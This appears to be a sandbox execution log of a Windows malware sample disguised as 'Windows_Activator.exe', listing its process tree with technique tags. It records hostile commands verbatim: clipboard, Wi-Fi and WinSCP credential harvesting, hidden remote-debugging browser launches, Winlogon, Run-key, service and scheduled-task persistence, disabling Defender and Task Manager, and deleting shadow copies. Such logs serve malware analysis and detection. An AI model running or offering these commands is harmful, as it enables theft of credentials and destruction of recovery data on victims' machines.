C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"4⤵PID:3460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""3⤵PID:1612
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"4⤵PID:1780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""3⤵PID:1564
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"4⤵PID:5640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""3⤵PID:4008
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"4⤵PID:2848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\QBy5MYeY9weD_tezmp.ps1""3⤵PID:5508
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\QBy5MYeY9weD_tezmp.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
PID:1952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"3⤵PID:5244
-
C:\Windows\system32\tasklist.exetasklist /FO CSV /NH4⤵
- Enumerates processes with tasklist
PID:6080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "mullvad account get"3⤵PID:5500
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp""3⤵PID:5484
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5944
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4804 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""3⤵PID:224
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6020
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"4⤵PID:5256
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-24003⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2272 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7fff1fd8dcf8,0x7fff1fd8dd04,0x7fff1fd8dd104⤵PID:1896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2104,i,3209650196158676288,17012844061934669851,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2100 /prefetch:24⤵PID:2276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2284,i,3209650196158676288,17012844061934669851,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2292 /prefetch:34⤵PID:1936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2412,i,3209650196158676288,17012844061934669851,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2612 /prefetch:84⤵PID:5528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2960,i,3209650196158676288,17012844061934669851,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3144 /prefetch:14⤵
- Uses browser remote debugging
PID:5420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,3209650196158676288,17012844061934669851,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3032 /prefetch:14⤵
- Uses browser remote debugging
PID:4932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,3209650196158676288,17012844061934669851,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4496 /prefetch:14⤵
- Uses browser remote debugging
PID:1564
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-24003⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5912 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x274,0x7fff286ef208,0x7fff286ef214,0x7fff286ef2204⤵PID:5260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2264,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:24⤵PID:6128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1932,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=2312 /prefetch:34⤵PID:3020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2496,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=2648 /prefetch:84⤵PID:5828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3616,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:14⤵
- Uses browser remote debugging
PID:6068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3592,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:14⤵
- Uses browser remote debugging
PID:228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4332,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:14⤵
- Uses browser remote debugging
PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4388,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:24⤵
- Uses browser remote debugging
PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5308,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=5312 /prefetch:84⤵PID:1224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5016,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=4088 /prefetch:84⤵PID:5528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5344,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:84⤵PID:2136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5208,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:84⤵PID:5292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6224,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:84⤵PID:5608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6224,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:84⤵PID:3456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6408,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=6364 /prefetch:84⤵PID:6132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:84⤵PID:5476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6540,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=6784 /prefetch:84⤵PID:2112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6580,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=6504 /prefetch:84⤵PID:1228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6668,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=6836 /prefetch:84⤵PID:5956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6824,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=6856 /prefetch:84⤵PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7156,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=7164 /prefetch:84⤵PID:2276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6672,i,8709512875066106080,14844442609944464728,262144 --variations-seed-version --mojo-platform-channel-handle=6796 /prefetch:84⤵PID:832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "sc create WindowsNovaBooter binPath= "C:\Users\Admin\AppData\Local\Microsoft\MagTable\Windows_Activator.exe" start= auto obj= LocalSystem"3⤵PID:4140
-
C:\Windows\system32\sc.exesc create WindowsNovaBooter binPath= "C:\Users\Admin\AppData\Local\Microsoft\MagTable\Windows_Activator.exe" start= auto obj= LocalSystem4⤵
- Launches sc.exe
PID:4064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit"3⤵PID:3792
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1936
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit4⤵PID:5840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Program Files\Windows NT\TableTextService\Windows_Activator.exe" /f"3⤵PID:5656
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Program Files\Windows NT\TableTextService\Windows_Activator.exe" /f4⤵
- Modifies WinLogon for persistence
PID:1012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_GyasyL"3⤵PID:5624
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_GyasyL4⤵PID:972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_GyasyL"3⤵PID:6044
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_GyasyL4⤵PID:6064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupGyasyL /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe\" /F /rl highest"3⤵PID:5804
-
C:\Windows\system32\cmd.execmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupGyasyL /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe\" /F /rl highest4⤵PID:4388
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn WindowsDriverSetupGyasyL /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe\" /F /rl highest5⤵
- Scheduled Task/Job: Scheduled Task
PID:5644
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows_Activator.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""3⤵PID:1008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "4⤵
- Command and Scripting Interpreter: PowerShell
PID:6108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"3⤵PID:1096
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵PID:5592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reagentc /disable"3⤵PID:1572
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:5240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_GyasyL /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe /f"3⤵PID:6000
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_GyasyL /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe /f4⤵
- Adds Run key to start application
PID:2376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_GyasyL /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe /f"3⤵PID:5208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5976
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_GyasyL /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe /f4⤵
- Adds Run key to start application
PID:6012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "3⤵PID:4604
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
PID:5924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "vssadmin delete shadows /all /quiet"3⤵PID:3640
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:5444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutzenKR.ps1" -RunAsAdministrator"3⤵
- Access Token Manipulation: Create Process with Token
PID:5136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutzenKR.ps1" -RunAsAdministrator4⤵
- Command and Scripting Interpreter: PowerShell
- Access Token Manipulation: Create Process with Token
PID:6048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:4292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:4748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:4064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:6104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:1184
-
